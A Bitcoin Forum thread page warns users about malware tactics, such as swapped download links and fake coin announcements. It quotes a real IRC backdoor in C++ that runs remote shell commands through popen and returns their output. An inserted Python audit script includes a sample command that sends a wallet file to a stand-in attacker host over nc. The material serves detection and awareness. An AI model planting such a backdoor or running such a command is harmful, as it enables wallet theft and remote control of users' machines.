Bitcoin Forum
May 04, 2024, 11:59:33 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 [29] 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 694070 times)

erichall
Full Member
Activity: 350
Merit: 107
April 03, 2018, 11:43:32 PM
#561

It does seem to get worse.

But the best thing you can do to start with, in protecting your funds, is to get yourself a hardware wallet and store tokens there. Avoid online wallets like MEW.

jaymor11
Newbie
Activity: 88
Merit: 0
April 04, 2018, 02:52:06 AM
Last edit: April 04, 2018, 03:56:42 AM by jaymor11
#562

Malicious software, or "malware" for short, is a broad class of software built with malicious intent. To identify it, I will tell you how.

A newbie asks for the latest wallet, or a wallet that doesn't have any TX fees, or the latest/fastest miner, and the attacker posts a program with malware embedded as a response. This type of attempt usually gets spotted pretty quickly.

The attacker creates a new ANN topic and posts a malware link as the download file (or a legit one and changes it to a malware one later).

The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Those were just some examples of how they use it. So think before acting.

sudnokpok
Full Member
Activity: 406
Merit: 106
April 04, 2018, 07:09:51 AM
#563

Yeah, be careful what you are opening. I had a problem once and could hardly fix it. These malware infections are very dangerous. Every miner should know that.

MashaVik
Newbie
Activity: 122
Merit: 0
April 05, 2018, 06:33:31 PM
#564

Wow! Thanks for the info! Excellent data! I will carefully study this subject and take my notes!

ArunV10
Newbie
Activity: 3
Merit: 0
April 06, 2018, 03:22:06 AM
#565

Very interesting read! Thanks!

laserfocused
Member
Activity: 171
Merit: 10
April 07, 2018, 12:18:16 AM
#566

Quote
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins, so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with its source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
// Handler in the IRC bootstrap code. CBuff, CRead, CFree and CLine are
// macros that hide what is really being called.
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // Everything from the first command word onward is handed to CRead.
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        // Reply target: the sender's nick, cut out of ":nick!user@host".
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with the macros resolved:
Code:
// Any IRC PRIVMSG whose text is "! <command>" (so vWords[3] == ":!") runs
// <command> in a shell, with the wallet's privileges, and sends the output
// back to whoever sent the message.
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // Everything from the first command word onward goes to popen().
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;   // collect the command's stdout
        pclose(buf);
        // Reply target: the sender's nick, cut out of ":nick!user@host".
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Exfiltrate the output over the same IRC connection.
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition by casual inspection. Also, this would likely not show up on any virus scans.

Thanks for posting this. There is always something that we have to look out for.
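The IRC backdoor quoted above, and the swapped-link tricks that both that post and post #562 describe, leave a reviewer with two concrete questions: which IRC message fires the handler and what string reaches popen(), and where in a source tree shell-execution calls sit, including ones hidden behind #define aliases such as CRead. The script below is an added example written for this page; it is not code from the thread or from any coin's repository. It assumes the client splits a raw IRC line on single spaces (as the old Bitcoin irc.cpp ParseString() did); the list of shell sinks, the IRC lines and the source fragment it runs on are all constructed for the example.

```python
"""Added example (not from the thread): two audit helpers for the IRC
backdoor pattern quoted above.

would_trigger()    re-implements the snippet's condition on a raw IRC line and
                   returns (sender_nick, command_passed_to_popen) or None.
find_shell_sinks() scans C/C++ source for shell-execution calls, following
                   one level of '#define alias real' so CRead -> popen is found.
"""
import re
from typing import List, Optional, Tuple

# Functions that hand a string to a shell or spawn a process (assumed list).
SHELL_SINKS = {
    "popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
    "ShellExecute", "ShellExecuteA", "WinExec", "CreateProcess",
}


def would_trigger(line: str) -> Optional[Tuple[str, str]]:
    """Mirror the backdoor's check on one raw IRC line.

    The snippet tests vWords[1] == "PRIVMSG", vWords[3] == ":!" and a non-trivial
    vWords[0], then runs strstr(strLine, vWords[4]) through popen(). Assumes the
    line was split on single spaces, as the old irc.cpp ParseString() did.
    """
    w = line.split(" ")
    if len(w) < 5:  # the snippet indexes vWords[4] without a length check
        return None
    if not (w[1] == "PRIVMSG" and w[3] == ":!" and len(w[0]) > 1):
        return None
    # strstr() returns the FIRST occurrence of vWords[4] in the whole line, so an
    # earlier match (e.g. inside the hostmask) widens what the shell receives.
    command = line[line.find(w[4]):]
    # Reply target: vWords[0] minus the leading ':' and everything from '!' on.
    nick = w[0][1:].split("!", 1)[0]
    return nick, command


def find_shell_sinks(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, name_as_written, resolved_name) for each sink call.

    Catches calls written as the real function and calls made through a simple
    '#define alias real' macro, which is how the quoted code hid popen().
    """
    aliases = {}
    for m in re.finditer(r"^\s*#\s*define\s+(\w+)\s+(\w+)\s*$", source, re.M):
        if m.group(2) in SHELL_SINKS:
            aliases[m.group(1)] = m.group(2)
    names = SHELL_SINKS | set(aliases)
    call = re.compile(r"\b(" + "|".join(sorted(names, key=len, reverse=True)) + r")\s*\(")
    hits = []
    for no, text in enumerate(source.splitlines(), 1):
        if text.lstrip().startswith("#"):
            continue  # the #define lines themselves are not calls
        for m in call.finditer(text):
            hits.append((no, m.group(1), aliases.get(m.group(1), m.group(1))))
    return hits


# Constructed IRC traffic: the first line is an attacker's trigger message.
SAMPLE_LINES = [
    ":mallory!x@evil.example PRIVMSG #coin :! cat ~/.coin/wallet.dat | nc evil.example 4444",
    ":alice!a@host.example PRIVMSG #coin :hello everyone",
    ":bob!b@host.example PRIVMSG #coin :!help",  # no space after '!', so no trigger
]

# Constructed source fragment in the style of the quoted backdoor.
SAMPLE_SOURCE = """\
#define CBuff "PRIVMSG"
#define CRead popen
#define CFree pclose
#define CLine FILE
void ProcessIrcLine()
{
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) { CFree(buf); }
    }
}
"""

if __name__ == "__main__":
    for raw in SAMPLE_LINES:
        print(repr(raw[:40]), "->", would_trigger(raw))
    for no, name, real in find_shell_sinks(SAMPLE_SOURCE):
        print(f"line {no}: {name}() -> {real}()")
```

Run it against a real tree by reading each .cpp/.h file into find_shell_sinks(); any hit inside network or IRC handling code deserves a line-by-line look, and a macro that resolves to popen() or system() is a red flag on its own, because there is no honest reason to alias those names.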

cemungut
Member
Activity: 125
Merit: 10
April 07, 2018, 07:34:26 AM
#567

This information is so useful: we can secure the wallet from the virus that would cause a big problem later, so we should be able to find the right solution to prevent it by having good security ;)

cryptojaymark
Newbie
Activity: 98
Merit: 0
April 07, 2018, 09:30:40 AM
#568

Thanks, this was very informative, and thank you for informing us.

sayboo999
Newbie
Activity: 209
Merit: 0
April 08, 2018, 09:02:19 PM
#569

Hello :) My first wallet was hacked and now I am very cautious... I have installed a firewall; will it help to protect my savings...?

supremo666
Newbie
Activity: 266
Merit: 0
April 09, 2018, 11:36:36 AM
#570

Thanks for the information...
But can you please give us the exact names of the coins... Thank you!!!

aedankreios
Jr. Member
Activity: 182
Merit: 1
April 10, 2018, 12:11:20 PM
#571

Thank you for letting us know this information; it will really help individuals to secure their accounts. Just avoid the things you find suspicious.

sudnokpok
Full Member
Activity: 406
Merit: 106
April 11, 2018, 08:39:11 AM
#572

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Legion381
Newbie
Activity: 19
Merit: 0
April 11, 2018, 03:44:03 PM
#573

Seems very good.

tonyt25
Newbie
Activity: 10
Merit: 0
April 12, 2018, 09:00:44 AM
#574

Wow, I am really loving this platform.☺️😂😃😁

t25tony
Newbie
Activity: 3
Merit: 0
April 12, 2018, 09:06:47 AM
#575

Nice 👍 job against these malwares; I fell victim on a couple of occasions and it is not a nice experience. Good job 👏🏼 guys.

altcoiner
Full Member
Activity: 351
Merit: 100
April 12, 2018, 09:23:40 AM
#576

As much as we like freebies, we should be careful of the applications we install on our systems, especially hacked copies of an application, because most hackers want valuable information from us, which we give to them without knowing. My first BTC wallet balance was emptied by a Zbot/Zeus trojan because I had saved the private key and password on my desktop. I learnt my lesson the hard way.

always2late
Newbie
Activity: 62
Merit: 0
April 13, 2018, 06:29:16 AM
#577

You know, I'm really glad that I'm seeing this. I lost a bunch of money when https://coinsmarkets.com went down, and I felt like an idiot. I've been in the space too long to be making noob mistakes like leaving your coins on the exchange, but at the same time, I've also been in the space for so long that I don't trust every random developer who makes a coin. With that said, I still feel dumb for my choices, not because I left coins in general but because the coins that I had on the exchange were coins that I had wallets installed for.

The main point of this post is that we're getting to the point where, for those of us who really understand what's going on but aren't software devs ourselves, it's scary AF to get into any of these non-major platforms.

zmeddy
Sr. Member
Activity: 532
Merit: 250
April 13, 2018, 11:03:13 AM
#578

OMG, thanks for the information. I'm always very afraid of losing my data or getting a virus; I just cleaned my computer of a miner that had been mining on it for almost six months :(

alex massi
Newbie
Activity: 89
Merit: 0
April 18, 2018, 05:46:47 AM
#579

Thanks, that is really serious. I mean, copying links would do that; we all should be careful.

sudnokpok
Full Member
Activity: 406
Merit: 106
April 18, 2018, 05:50:14 AM
#580

In my case, IE11 was completely locked up and I had to be fast with the "end process" clicks. I've never had my browser hijacked like this. That is, unless we count AMD's user surveys they keep imposing on us after a driver install.